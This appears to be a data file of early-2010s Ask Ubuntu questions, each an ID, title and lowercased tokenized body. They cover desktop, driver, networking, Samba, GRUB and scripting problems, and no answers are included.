96790	is there an postgres erd tool ( or pgadmin iii plugin ) ?	do n't hold it against me , but i have a fond memory of ms sql server management studio . i could very easily generate an erd diagram from an existing database . tables , relationships , the works . you could even use the diagram to edit the database structure . i ca n't find such a tool in pgadmin iii . am i missing something ? it seems there is n't one built-in . is there a plugin ? or a separate tool ? ( i have found references to using dia and other tools to model first and then generate the sql to create the database . this is nice , but secondary to my primary goal which is to generate a diagram from an existing postgresql database . and to truly replicate management studio functionality , the application would have to work in both directions . )
96791	network share 'remember forever ' option does n't work	i use ubuntu 11.10 with xfce & gnome , and am dependent on company network infrastructure for windows shares ( as well as outlook , but more on that later ) . so i also fall under their password policy , which dictates that i change it every so often . i keep up to date with all updates from ubuntu . the first time that i mounted network shares ( with a bookmarked smb : // url ) , i checked the 'remember forever ' option and it worked just fine . reboot , mount a network share , no problem , all automatic . then came the first mandated password change and it took all the fun of working with network shares away , because now i have to fill in the domain and the password after each reboot , no matter how often i check the 'remember forever ' box . i also compiled 'openchange ' in the mean time ( out of dissatisfaction with evolution ) , which includes a 'samba4 ' sourcetree . could that have anything to do with it ?
96794	can not copy text from chm file	i have a download book which is in chm format . when i open the book in windows os , i can copy the text in the book and paste it . however , when i read the book under ubuntu os , i can not copy text from this book . why is that , and how do i enable text copy from chm files in ubuntu ?
96798	where does seahorse/gnome keyring store its keyrings ?	i 'm wondering where exactly seahorse is storing the keyring data ? most available information points to ~/.gnome2/keyrings/ , however , this directory contains only two very small files ( login.keyring , 105 bytes and user.keystore , 207 bytes ) which are definitely not large enough to contain the over 20 keys stored in my login keyring . i 'd like to include the actual keyring data in my backup , so where is it ?
96802	is it possible to store thunderbird 's passwords in gnome keyring ?	currently thunderbird has its own password manager , but it offers two possibilities : either you do n't encrypt the password stored , or you use another password to encrypt the actual one for e-mail . this sounds quite useless to me , so i would prefer to store thunderbird passwords in gnome keyring . hope this is possible .
96804	can i make new tabs open in my default chrome ( ium ) profile ?	i am using chrome and chromium 16.0.912.75 ( from the stable channels ) . i find the profile feature really useful . however , when new tabs are opened , or when i launch chrome for the first time , the window/tab opens in the last profile i was using , not the default one . instead i 'd like new tabs opened from external applications , and the first window opened by the launcher , to use the same profile every time . if there is already a chrome ( ium ) window open for that profile , the new tab should appear there . if that profile does not already have a window , a new window should be opened for it . my current workaround has been to make all my profiles in chrome , and a single profile in chromium . one profile in chrome is synched with the chromium one via my google account . chromium is my default browser . this way , all new tabs are opened in chromium , in my preferred profile . if i want to access the other profiles , i use chrome . i 'd much prefer to keep it simple ! i know i could make my own chrome .desktop file to force opening in the new profile every time , but the `` memory '' issue would remain for new tabs . according to this superuser question it is kinda possible in windows with some registry editing . is there any way to force new tabs to open in specific profile in ubuntu ?
96806	captcha at ubuntu one account registration does n't show up in windows 7	i can not sign up for a new ubuntu one account from windows 7 , because the captcha does not appear . although refreshed several times .
96807	is there a way to superimpose a transparent image over everything that is displayed on screen ?	is there a way in ubuntu/xubuntu to superimpose an image ( ie transparent texture ) over everything that is displayed on the screen ? please see a screen capture with the same effect but produced by setting the texture as the background image and adjusting the alpha lever for the window . this method has the inconvenience of adjusting the alpha lever for every window displayed and the fact that two transparent windows stacked one over the other do n't look very nice . the screen capture is from xubuntu 11.10 .
96808	how do i connect samba with a remote print server ( i.e . remote cups ) ?	in this particular setup , samba & cups run on two different servers , say server a ( for samba ) and server b ( for cups ) . what i want to achieve is that print jobs coming from samba users ( windows clients ) should be handled by samba server ( server a ) and then handed to cups server ( server b ) to be printed by the chosen printer . how to interface this samba server ( server a ) and cups server ( server b ) ? how to make printers ( attached to server b ) visible via samba ?
96811	dual monitor in ubuntu 11.10 is resetting the theme	i 'm experiencing a strange problem with dual monitors . when i set the dual monitor via `` nvidia settings '' and save the setting to xorg.conf , the default unity theme and icons are turning back to gtk default . i also get an error telling me `` could not apply the stored configuration for monitors '' here is my xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 280.13 ( buildd @ yellow ) fri aug 5 12:31:28 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` chi mei optoelectronics corp. '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 540m '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 , crt : 1680x1050 +1920+0 '' subsection `` display '' depth 24 endsubsection endsection here is an example of what i 'm talking about : http : //i.stack.imgur.com/vrlw1.png how can i fix this ? thanks in advance .
96813	enable terminal beep with pactl	i found a way to enable the terminal beep : pactl upload-sample /usr/share/sounds/gnome/default/alerts/glass.ogg bell.ogg but this gets lost after a reboot . how can i execute this command automaticaly , everytime i start the desktop ? ubuntu : 11.10 with unity .
96816	customize chromium with user.css like in firefox	in firefox i edit userchrome.css file for customize the bookmarks bar with this code : file in /home/gabriel/.mozilla/firefox/t5w3u0oy.default/chrome/userchrome.css code : /* kill icons for bookmark folders in bookmarks menu */ .bookmark-item [ type= '' menu '' ] > .toolbarbutton-icon { display : none ; } /* hide text of bookmarks*/ .bookmark-item : not ( .bookmark-group ) : not ( [ type= '' menu '' ] ) > .toolbarbutton-text { display : none ! important ; } my question is how to do the same in chromium , the custom.css file i found in this folder : /home/gabriel/.config/chromium/default/user stylesheets/custom.css thanks
96818	how can i run php 5.2 on 10.04 ?	for drupal servers , i used to install 10.04 ( lucid ) + php 5.2 ( karmic ) . now that karmic is gone , i do n't know where to take php 5.2 any more . is there any proven replacement/alternative to this approach ? cheers ! !
96821	bookmarked shares on a home server constantly disappearing after shutdown	anyone know how to carry bookmarked shares on a home server from session to session ? they seem to disappear after shutdown . found this which seems to indicate that it is only possible after 12.04 , but hard to believe that this is so and does n't exist already- after all why bookmark at all if they are removed after logoff ? ( http : //www.omgubuntu.co.uk/2012/01/nautilus-quicklist-adds-bookmark-support-for-precise/ )
96827	visual editor for xslt	i was wondering if it is included in ubuntu any gui tool to support the creation of xslt -- bonus points if it also shows how it transforms some reference xml source as i write the xslt document . i 've had a look in apt-cache search but can not find anything related , although it sounds weird to me that there is nothing for doing that ... thanks for your help !
96828	dragging files across workspaces in 11.10	in 11.04 , i was able to select a file in nautilus and while dragging/folding the file change workspace using the regualr keyboard shortcut keys . this was very handy if for example i had to attach a from folder i had been working in -- simply start dragging , change to the workspace where i was composing an email and then drop . this does not work under 11.10 . if i hold a file , i am no longer able to change workspace . the keyboard shortcuts simply have no effect . is there some way i can regain the described behavior ?
96829	how do i install a mock tango control system server ?	i need to install a mock tango distributed control system server . following the instructions on http : //www.tango-controls.org/howtos/binary_deb i have done the following ( installing on a virtualbox client running 11.10 ) : disabled ipv6 ignored wifi instructions ( vb client is told it is using ethernet ) updated /etc/hosts to reflect current ip ( my network address changes occasionally , so i will update it when it does ) added the ppa : tango-controls/core ppa following the steps for installing tango on a control system main server installed the mysql-server package , created a root password for the database installed the python-pytango package - the correct hostname was already filled in when i was prompted for it installed the tango-starter and tango-db packages - filled in a password here did not install libtango-java package ( i am using python ) installed the omninotify package did not install tango-accesscontrol ( i do n't think i need this ) installed the tango-test package ( it seemed like a good idea ) did not know what to do about the following `` nevertheless , the path used by the starter device server to find other device server process executable is not initialized . you have to do it according to how you configure your system using the starter device property or even better using the astor gui . '' where do i go to configure this ? i could not find a download for astor on http : //www.esrf.eu/computing/cs/tango/tango_doc/tools_doc/astor_doc/index.html - should i be looking elsewhere ? the astor page above looks a bit old . is there maybe a newer configuration tool ? i forged ahead anyway , following the pytango quick tour : ipython -p spock ( successful ) pytango.__version__ ( returned '7.2.0 ' ) tangotest = deviceproxy ( `` returns sys/access_control/1 sys/database/2 sys/tg_test/1 tango/admin/mycomputer tangotest = deviceproxy ( `` sys/tg_test/1 '' ) ( no results , looks successful ) tangotest.ping ( ) ( returns an error requesting tango_error ) tango_error returns full version of the previous error : api_cantconnecttodevice : failed to connect to device sys/tg_test/1 the connection request was delayed . the last connection request was done less than 1000 ms ago for more detailed information type : tango_error spock [ 9 ] : tango_error last tango error : devfailed [ deverror [ desc = failed to connect to device sys/tg_test/1 the connection request was delayed . the last connection request was done less than 1000 ms ago origin = connection : :reconnect reason = api_cantconnecttodevice severity = err ] ] where to next ?
96831	consistent view modes in dolphin fm	when using dolphin , each folder seems to have its own configuration for view modes . meaning that if i change my view mode to `` details '' and then go into another folder that has `` icons '' as it 's view mode , it just reverts back to icons.. is there any way to disable folder specific view modes and have it just respect the view mode i chose ? thanks
96836	need to skip lost+found when using find	i am new to ubuntu and i do not have alot of experience with linux/unix , so please bear with me while i try to get through this . i have a camera system that records footage and takes screen shots and stores them in a folder . the problem is that the new files do not overwrite the older files , so the file system fills up and all new files are discarded . so i installed scheduled tasks in the ubuntu gui and created a task to run every day . here is the task : find /media/dvr/* -type f -mtime 0 -exec rm -rf { } \ ; i have the -mtime set to 0 for testing purposes , it will be set to 7 if i can get this to work . the problem i have is there is a lost+found folder in the /dvr folder . when it gets to that folder it says i do not have permission to view it and it never finishes its search . i have used sudo to get in and change the ownership and rwx permissions , but that still does n't help . is there a way to accomplish what i want to do by using find ? is there a more efficent way of cleaning out the /dvr/ folder ? like i said , new to this and trying to get better . any help would be greatly appreciated !
96837	changes made in libreoffice impression master slides are not seen in presentation	i need presentation frequently for my teaching , when i want to make changes presentation wide using master view it is not shown in presentation and i need to do it manually for each slides
96838	select language from login screen	i believe it was possible to select language before login in ubuntu 10.04 . i ca n't find that feature in 11.10 - is there a way ? do i have to switch to gnome to get this feature ? i want to setup a computer for a lobby , where people with different native languages and with limited computer skill can login . also would like to have an automatically solution when the question if the folder names will change name ?
96847	how do i get a broadcom 4318 wireless card working ?	my broadcom 4318 card is recognized when lspci is entered in terminal . it will not work though . i did a sudo apt-get update then install b43 but nothing ... ... . any ideas ? ubuntu 11.10
96849	sharing files in lan through samba or ssh	i am able to share files between two ubuntu machine and windows machine but i have these problems which i ca n't solve . when i share files between two ubuntu machines via lan computer1 to computer2 . do i need samba on both machines ? if no ( relative to upper question ) then in case of transferring p2to when i access another ubuntu machine from ubuntu , without defining file and directory permissions on computer1 i see all files under / on computer2 . is there any way to stop that visibility ? how to set permissions on the folder or directory i want other users to be able to see ? how to set a customized list of shared folders or files ? which user and password i use while accessing other ubuntu machine samba user or system admin user ? is it work on both . can i use it without password ? how i share file without using gui samba or using terminal . why computer2 is not getting shown on my network connection in computer1 ? ( without using connect to server option ) why my linux system is not shwoing in this ? finding other system without knowing name or ip over lan ? help me through this
96852	faenza microphone icon missing in the sound indicator	i just installed the faenza icon theme and the microphone icon under the sound indicator is missing and replaced by a placeholder . what can be the cause of this and how can i solve it ?
96857	why do the ubuntu 11.10 file/share bookmarks always disappear between sessions ?	why do the ubuntu 11.10 bookmarks ( i bookmarked shares on my home server ) always disappear between sessions . it 's very tedious to have to enter them again every time . they are not listed in my ~.gtk.bookmarks any more , just the basis stuff as below . file : ///home/david/dokumente file : ///home/david/musik file : ///home/david/bilder file : ///home/david/videos file : ///home/david/downloads file : ///home/david/ubuntu % 20one ubuntu one file : ///home/david i know i could use samba preloaded mounts , but that 's what i was trying to get away from
96861	start lxde with lubuntu configuration using command	on my computer i have a neat little lubuntu installation running . it loads a nice lxde desktop themed with the nice lubuntu theme whenever i use lxdm to login . when i use the startlxde command to start lxde however , the desktop session that gets loaded is a default , bare bones lxde session which appeals less to my taste . kind of a shame ! the reason that i use startlxde to start a session is that i 'm attempting to log on remotely using nx . i need to supply a command to nx that starts up an x desktop it can use , and startlxde does just that . but as stated above does n't load the right theming and lxpanel configurations unfortunately . is there a way to load the same lubuntu configuration ( with the proper theming and lxpanel settings ) as lxdm does when i log on over nx ?
96865	power saving with free radeon ( ati ) driver	i 'm using ubuntu 11.10 without the proprietary driver for ati video cards and i like very much the performance . my only need is activate power saving when i use the laptop with the battery . thanks
96866	how can i connect to the recovery console of a remote server ?	so , my ubuntu server 's hard drive went into emergency read-only mode while i was in an ssh session . thankfully , i was able to connect with sftp and grabbed a few critical files , although , stupidly , it did n't occur to me at the time to download all my other projects . i then restarted the server through ssh , hoping it would automatically repair any disk errors and boot normally . it did n't , so now i can not connect to ssh . i 'm assuming it is sitting in recovery console . does recovery console have any emergency remote services enabled by default ? like telnet on a really high port number or something ? i wo n't have physical access to the machine for another few months , so i do n't know what to do . i believe it is running ubuntu server 10.04 . thanks in advance for suggestions .
96870	is there a way to do full disk encryption after the install ?	is there a way to do full disk encryption after the install ? i have ubuntu 11.10 installed with /home encrypted but really need the whole drive encrypted . i would really like to do that with out a re-install . is there anyway to do that ?
96871	why is iscsi support not included on the alternate installer ?	does anyone know the reason that canonical decided not to include the ability to install to iscsi using the `` alternate '' installation cd ( on 10.04 at least ) ? ubuntu 10.04 server installation cd support installing to iscsi , but when you try to follow the same steps in the alternate installer the options needed are not there ... so far i have been installing `` ubuntu-desktop '' onto the server installation after-the-fact , but this is tedious . since both use the same installer , i can only assume it was a conscious decision not to include it ... why ?
96877	live cd and usb install failure blank screen when trying to install on an hp pavilion dv6	i recently bought a new computer , and have been trying to install linux on it , 11.10 x64 . it is a hp pavilion dv6-6117dx . 2.4ghz/1.5ghz vision a8 technology from amd with amd quad-core a8-3500m accelerated processor amd radeon hd 6620g discrete-class graphics i am pretty sure i picked a unsupported graphics card or something . i have tried booting from usb as well , but the screen becomes blank after rebooting .
96879	how do i setup an apt mirror that only gets security updates ?	i maintain a few dozen servers all running lucid . setting up a local mirror is probably a good idea anyway , but i also have a unique need . the ( ec2 instance ) servers are all configured to get security updates only . that 's how i want it . the problem is that when i create a new server/ec2 instance and download packages , those packages are completely current and out-of-sync with the rest of the cluster . i can use chef to pin explicit package versions , but then minor updates will make whatever we pin unavailable . so what i 'd like to do is this ... i want an apt mirror that mirrors the lucid repository , but only gets security updates , not regular ones . then by pointing all my servers to that mirror , i can keep everything running the same version , but also avoid unnecessary updates . setting up a mirror itself with apt-mirror seems simple enough , but what i 'm missing is how to make sure the mirror only does security . how do i setup an apt mirror that only gets and propagates security updates ? i feel like i 'm missing something obvious .
96882	can i determine if a grub menu.lst is valid on a virtual machine without rebooting ?	there 's a problem with ubuntu running on my hosted vps . all i have access to is a recovery console which allows me to mount the devices . i 've narrowed the problem down to a messed menu.lst . i have the kernel and initrd pointing to the correct images , but i have no idea what the drive identifiers are when the virtual machine is started . also , using the grub command line gives errors when attempting to access the drives . can anyone give me advice on what i can do to determine the drive identifiers , or anything else that might help ? grub version is 0.97 . update : i 'll quickly go over my environment slightly . i 'm in the recovery console , which , from the look of it , acts like a live cd . i 've mounted my vps root ( sdb1 ) to /mnt . i 've mounted dev using mount -o bind /dev /mnt/dev i can see two other drives in /dev ; sda , ( which holds isolinux ) and sdb2 which is my vps swap . i 've then chrooted into /mnt/ to access the grub prompt . i then get the following : grub > root ( hd0 , < tab > grub > root ( hd0,0 ) error 5 : partition table invalid or corrupt . on the first command , grub shows no suggestions when i press tab . also , only hd0 is found . i 'll be putting bounty on this question as soon as i 'm allowed . thanks for your help ! update2 : fdisk -l /dev/sdb // does n't exist . fdisk -l /dev/sdb1 // my root partition . ... disk /dev/sdb1 does n't contain a valid partition table .
96884	putlocker and sockshare not working	in ubuntu 11.10 , the putlocker and sockshare websites do not work anymore . they work perfectly in windows ... . within the player there is a message that says netstream not found.netstream.play.streamnotfound is this has to do something with avi plugin ? any solutions ?
96885	ca n't enter password in recovery mode	when i go into recovery mode to get to the command line , i enter `` telinit 3 '' to drop out of root . this works on my desktop , but on my laptop it asks for my username and password , then i hit enter and the first letter of my password appears and it does n't log me in . it then proceeds to ask me for my username and password again , and the issue continues . am i doing something wrong ? is this a known issue with a solution ? edit : worked around this by going into /etc/default/grub and setting it to boot in text mode . still would like a solution for this though .
96886	how to make svn look for if there is an update once a minute and if there is call some script ?	i wonder if it is possible to create such .sh script that a normal user would be capable to start with something like nohup ./superscript.sh > & /dev/null & and which would once a minute look into some svn , find out current version and if there was an update run commands like : kill `ps aux | grep -f 'serverapp ' | grep -v -f 'grep ' | awk ' { print $ 2 } '` ./server_automated_net_setup.sh cd server/install-dir/ export ld_library_path=./ : ~/server/install-dir/lib_boost : ~/server/install-dir/lib_openssl nohup ./serverapp > & /dev/null & that would kill currently running app , run some auto update script we already have in users home ~ and run it again . is it possible to create such script and how to do it ?
96887	how do i use grep to find all the zip files in a directory ?	i have a directory with over 1000 files , and a few of them are .zip files , and i want to turn them all into .tgz files . i want to use grep to make a list of file names . i have tried `` grep *.zip '' to no avail . reading the man pages , i thought that * was a universal selector . why is this not working ? thank you .
96892	how do you install less css command line compiler ?	from my understanding and correct me if i 'm wrong , i have to get ruby or npm installed to get the less css compiler working . i do n't have any ruby installed and i 'm not really sure how to get my computer to that point . i also want to minimize my footprint ; installing the minimal amount of ruby libraries if possible ( because i will never use ruby except for when i run less ) . what are the steps involved in getting less working and running ? before you down vote , i know there was this previous thread ( less ccs compiler install ) . this particular person already has some other packages installed . i 'm trying to figure out all the packages needed to get to that point . or if someone could point me to the right documentation i would be thrilled !
96893	is it safe to resize home and root partition	i 'd like to shrink my root partition as it is 20gb and i only use 5-6 gb . i was going to shrink it with gparted and use the free space for my home partition ( root and home partitions are sda6 and sda7 respectively ) . but upon choosing the new size for the home partition , gparted mentions that when resizing the partition containing '/boot ' , linux might be unable to boot . as i do n't know much about it , i ask here whether i can continue resizing the partitions without having to risk to re-install ubuntu again . also , if this ai n't possible , how should i resize my partitions as i need more space for '/home ' . thanx in advance
96899	suppose i want to create my own interface in ubuntu ?	basically , i want to try making my own menu/launcher system . for the menu i 'd like it to flow like the old drop-down menus ( places , applications , administration , preferences etc ... ) except with a hub and spoke concept . hover over the `` main menu '' icon and spokes appear with the spoke to the immediate right being highlighted . turn the hub ( sort of like an analogue dial ) to rotate the spokes and highlight the different options ( places , applications etc.. ) . selecting an option like applications then changes the text in the hub and the hub icon to `` applications '' and all the spokes change to the different categories under that heading . eventually , i 'd like for every launcher you put into your panel to be it 's own hub offering features . for example : a firefox hub would have spokes for opening another instance , bookmarks , safe-mode , etc . so , the firefox hub would allow you to open directly to a bookmark . stuff like that . i 've seen implementations close to this , but instead of the main icon taking on the characteristics of the selected menu item , it flowers out in concentric circles and gets large and cluttered . i 'd like a single icon/launcher to take on the properties of the selected item and the spokes to offer various options for the selected item/app . this may not be very good . especially if i have to make it . but i 'd like to try if anyone has any advice .
96906	broadcom bcm4313 on 11.10	okay so i 've this afternoon updated the family laptop to 11.10 . but our broadcom bcm4313 wireless card has stopped working . i tried googling and found someone saying you have to install a deb named 'b43-fwcutter_014-9_i386 ' and select the new driver but the driver did not appear in my list . the laptop is a compaq cq56 *** lshw output http : //pastebin.com/kntj6flt rfkill 0 : hp-wifi : wireless lan soft blocked : no hard blocked : yes it 's worth noting that i 've pressed the wireless key that usually turns the colour of a little light on the key from orange to white . but it just stays orange now . also after plugging in an ether cable and selecting it from network manager i still ca n't access the internet on the laptop . though that problem existed even on 11.04 when the wireless worked . okay i installed a driver that was older then the current one that was in use . after rebooting several times the wifi is now back on . when i installed it and rebooted once it did n't work . wonder why it did after i did rebooted several times ? for a moment i thought to install windows . do n't judge me . i was weak . i do n't know what came over me .
96909	is there any reason that the 64-bit ati drivers would be better ?	i installed 32-bit linux because back in the day 64-bit linux missed out on some cool stuff like java and flash . some of those things have been resolved ( maybe all , i 'm not as up-to-date as i was ) and currently i 'm having performance issues with the 32-bit versions of the ati binary driver . the machine i 'm on is 64-bit wide so i could switch to 64-bit , but i 'd like to do so only if there is an advantage to it . tl/dr ; are 64-bit ati binary drivers better/faster than their 32-bit counterparts ? update : with the shift to 64-bit a lot of things change at the instruction and hardware levels . i would expect 64-bit drivers to be able to process more data in a shorter amount of time . i do n't know if the types of operations that gpus benefit in this way or not . my feeling is yes , but by how much i do n't know . so i 'd like to know if anyone has spec 'd a gpu ( specifically an ati one , since that 's what i have ) using 32-bit and 64-bit drivers and seen a vast increase in speed on the 64-bit one .
96910	is it safe to delete partitions and start over ?	i actually partitioned my hard drive and set up ubuntu twice , so now on boot i 've got to choose between 2 ubuntu os 's and windows . what i 'd like to do is delete the ubuntu partitions and start over . is that a problem or can i use the gparted utility safely . by the way , there 's nothing on ubuntu at this time that is critical to save
96911	no sound after clean install 11.10	first of all , sorry to ask this , i 'm sure that this was asked so many times before . second , sorry for the english , it 's not my native language . and third , thank you in advance . so , i hope the follow info will help , here 's a log . http : //www.alsa-project.org/db/ ? f=07089caf530494bc4bc23e1d1cd56b3a5fae03c6 i already check 'system - > preferences - > sound ' . here 's a screenshot http : //i.imgur.com/ghwnj.png > jorge @ jorge-desktop : ~ $ sudo lshw -class multimedia > *-multimedia > description : multimedia audio controller > product : vt8233/a/8235/8237 ac97 audio controller > vendor : via technologies , inc. > physical id : 11.5 > bus info : pci @ 0000:00:11.5 > version : 60 > width : 32 bits > clock : 33mhz > capabilities : pm cap_list > configuration : driver=via 82xx audio latency=0 > resources : irq:22 ioport : e400 ( size=256 ) tried with no results : > sudo apt-get remove -- purge alsa-base > sudo apt-get remove -- purge pulseaudio > sudo apt-get clean & & sudo apt-get autoremove > sudo apt-get install alsa-base > sudo apt-get install pulseaudio > sudo apt-get install ubuntu-desktop also > sudo gedit /etc/default/grub > > from : > > grub_cmdline_linux_default= '' quiet splash '' > > to : > > grub_cmdline_linux_default= '' quiet splash radeon.audio=1 '' > > sudo update-grub > > and reboot ... without any result . edit : i made sure that everything it 's fine with aplay -l and lspci -v and lsmod ; and checked alsamixer , it 's not in mute . well i 'm running out of ideas . thanks .
96913	mutter : global menu integration	is it possible to have mutter merge the title bar of maximized windows and the panel , like happens with compiz and metacity ? i want to try to replace metacity with mutter in unity 2d , and so far it looks good appart from the missing panel integration .
96923	how do i change permissions on a fat32 formatted drive ?	i have big problem . i am using ms vc++ on win and qt creator on ubuntu . so , today i have problem . i ca n't change my permissions on my flash drive ( fat32 ) . q : how i can change permissions on fat32 flash-drive ? upd : i ca n't do it under root .
96925	can i configure unity to search for certain documents/files/pictures in /media	unity search is not bringing up documents/files that i 've opened before in an external hard drive /media that 's always connected . is there a command to extend the unity search to find these files without having to open nautilus and do a search ? even then , once i open the document , work on it , save it , it still will not come up in the unity search .
96928	booting ppc mac from cd using open firmware	i 've not had any success booting from a cd or dvd with various ppc versions of ubuntu using any of the suggested keys such as `` c '' . the only thing that has worked consistently for me is booting into open firmware . the problem i am now running into is that when i tell of to boot from the cd it ca n't find the \install\yaboot file . i think this is because the cd is burned with an iso disk image . how do i either ( a ) reference the disk image in the cd boot command ( e.g. , boot cd : ,\install\yaboot does n't work ) or ( b ) burn a non-iso cd ? right now i 'm working with the 10.04 desktop distro .
96933	scale a recipe in krecipes	how can i scale recipes in krecipes ? suppose i have a recipe in krecipes which is for 4 persons . now want to scale the amount of incredients that it fits for 3 persons ( or even 3.5 if you have 3 adults and one child for example ) .
96934	installed ubuntu from rescue	i 'm new to ubuntu , after extracting the iso file on the usb drive with the software provided by pendrivelinux.com and tried to install it but i got this error ( casper/vmlinuz file not found ) in the menu . after that i tried running the `` rescue option '' and hopefully it worked but the problem is that only shell was install by that there 's no gui : | . i 'm tried searching it on internet but i could n't find anything.i 'm totally confused . is there any way out to get the gui too ? p.s : i used official ubuntu torrent link to download the iso .
96939	how do i get colors and a correct character set with screen through putty ?	screen session over putty connections from windows are colorless and have a character set problem ( shows in curses applications like aptitude ) . a screen session on a proper terminal works just fine . how do i configure putty to make this work properly ? it 's an ubuntu server .
96951	libreoffice wo n't start ?	every time i click libreoffice in the menu , it returns this error : failed to execute command `` libreoffice -- writer % u '' .failed to execute child process `` libreoffice '' ( no such file or directory ) when installing libreoffice , it returns this error : the following packages have unmet dependencies : libreoffice-core : depends : libreoffice-common ( > 1:3.4.5 ) but it is not going to be installed libreoffice-java-common : depends : libreoffice-common but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i tried to run 'apt-get -f ' but it does n't solve the issue . any one know what to do ? if its worth mentioning , i tried installing open office , when running 'apt-get -f ' it says : dpkg : error processing /var/cache/apt/archives/libreoffice-common_1 % 3a3.4.5-0ubuntu1~ppa1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/mime/packages/openoffice.org.xml ' , which is also in package openoffice.org-debian-menus 3.3-9556 no apport report written because maxreports is reached already
96953	files disappear in ubuntu one for android	i use the ubuntu one apps for my samsung galaxy ace . since the last update i have the following problem : when i download a file from a folder and it failed ( because i lose connection or something else ) , then i can retry downloading it , because this file disappears in the list . after a restart it also is n't there . on my computer the file exists and in the online interface , too . when i move another file in the same folder , then the missing file is back . is there a good solution for this problem ?
96954	touchpad not working on hp pavilion dv4 3030tx	i recently installed ubuntu 11.10 on my laptop and everything is working out of the box except my touch pad . i have tried the following fixes , mouse not working on an hp dv4 , touchpad not working on hp pavilion dv6 but they have n't worked .
96957	where can i find the log file of my system temperature ?	so , i have the lm-sensors package installed , and i can run sensors and get details of my system temperature , like this : acpitz-virtual-0 adapter : virtual device temp1 : +45.0°c ( crit = +120.0°c ) k10temp-pci-00c3 adapter : pci adapter temp1 : +46.5°c ( high = +70.0°c ) ( crit = +115.0°c , hyst = +115.0°c ) what i 'd like to do is be able to view a log ( say , every 5 minutes ) of what the temperature is . is this possible ?
96959	no boot menu after installing ubuntu 11.10 on a dell windows vista home laptop computer ?	i just installed ubuntu 11.10 on a friends dell inspiron laptop . i normally boots up to windows vista home edition . as part of the install procedure i reduced the size of the largest ntfs partition to allow space for an ext4 root partition and a small swap partition . after the install completed it prompted to restart and what followed was a reboot with windows coming back up without any multiboot menu screen . where is the grub boot menu ?
96964	emacs unable to find fonts ?	i compiled emacs from source on ubuntu 11.10 and unfortunately , it only seems able to find the default x monospace font . how do i connect emacs with the system fonts ?
96965	tomboy alternatives	in windows exist an application named post-it ! notes . it 's a very complete program : it allow to use reminder , show the notes that were opened before shutdown the pc , task manager , ... do exist a complete note application for linux ?
96967	how do i fix this `` e : type '* ' is not known on line * in source list ... '' update error ?	every once in a while i see users having issues to update due to errors like this : e : type 'ain ' is not known on line 1 in source list /etc/apt/sources.list.d/some-ppa.list' with varying types/line numbers/source list files ( often after removing a ppa ) . how can such an error be fixed ?
96973	unable to load web pages from local apache server running ubuntu 11.10	i have been working on getting the newest version of ubuntu loaded on a netbook . i was able to download the utility to get the ubuntu image on a flash drive and managed to install it . however , i am having serious problems with apache on the netbook . i am sitting behind a cisco e1200 firewall with both my `` working pc '' ( a desktop ) and `` server '' ( the netbook ) talking through it . i am able to ping either device from the other and can access the internet from both . however , when i try to load index.html from the desktop browser , i get unable to connect firefox ca n't establish a connection to the server at localhost . i have uninstalled and reinstalled apache three or for times with no success . i have checked and rechecked all of the config files and they all look good . however , when i run netstat -tulpn ( on the desktop ) i see that apache is listening to port 80 but there is not an ip address listed next to the port number . any help you can provide would be appreciated . thank you .
96975	why does the screensaver show my desktop before locking ?	i leave my pc on for a while ... and then the screensaver kicks in . cool . so after another while i move my mouse or strike a key or whatever . this shows me the complete desktop , with like all the apps open . then , after like 2 seconds or more it starts fading out the desktop and then i get the `` gim me the password '' prompt . why does this happen ? edit : it 's been a while and i applied all the upgrades in the meantime and this keeps getting worse and worse . left the machine unattended for a while with vmplayer 4.02 running with winxp as guest os . came back to the machine , both monitors are in standby , so far so good . moved my mouse and both monitors came on . no password prompt , no nothing . i interacted with the vm for like two minutes and the shut the vm down . then , the screens started fading to black and then the password prompt came up .
96978	rsync to check/compare server1 : /data/archive/ to server2 : /data/archive/ and have the files synced to another destination such as server2 : /data/ ?	this has been tearing my hair out . i need to : compare server1 : /data/archive/ to server2 : /data/archive/ ( through rsync , ssh , etc ) filenames that do n't match , get copied ( scp ) to server2 : /data/ server1 and server2 have ssh , scp , rsync access between eachother .
96981	poor video performance with a dell d800	i upgraded my dell d800 from 8x to 10x with very poor results to my video . everything on the display seemed do be poorly rendered . i upgraded to 11.10 and some of the items are rendered properly but not all . the mouse pointer for example is simply a smudge of pixels . any ideas ?
96982	`` z , '' `` tab , '' `` 1 , '' and `` esc '' keys are acting weird	if i press the tab key , it opens a window to shutdown , log off , etc . the computer . the z key does `` undo '' . the number one key reloads the page . the esc key acts like ctrl+alt+del . if i try to use any of the keys , it wo n't work unless i press it quickly multiple times . i do n't have any sticky keys enabled under system → preferences → assistive technologies .
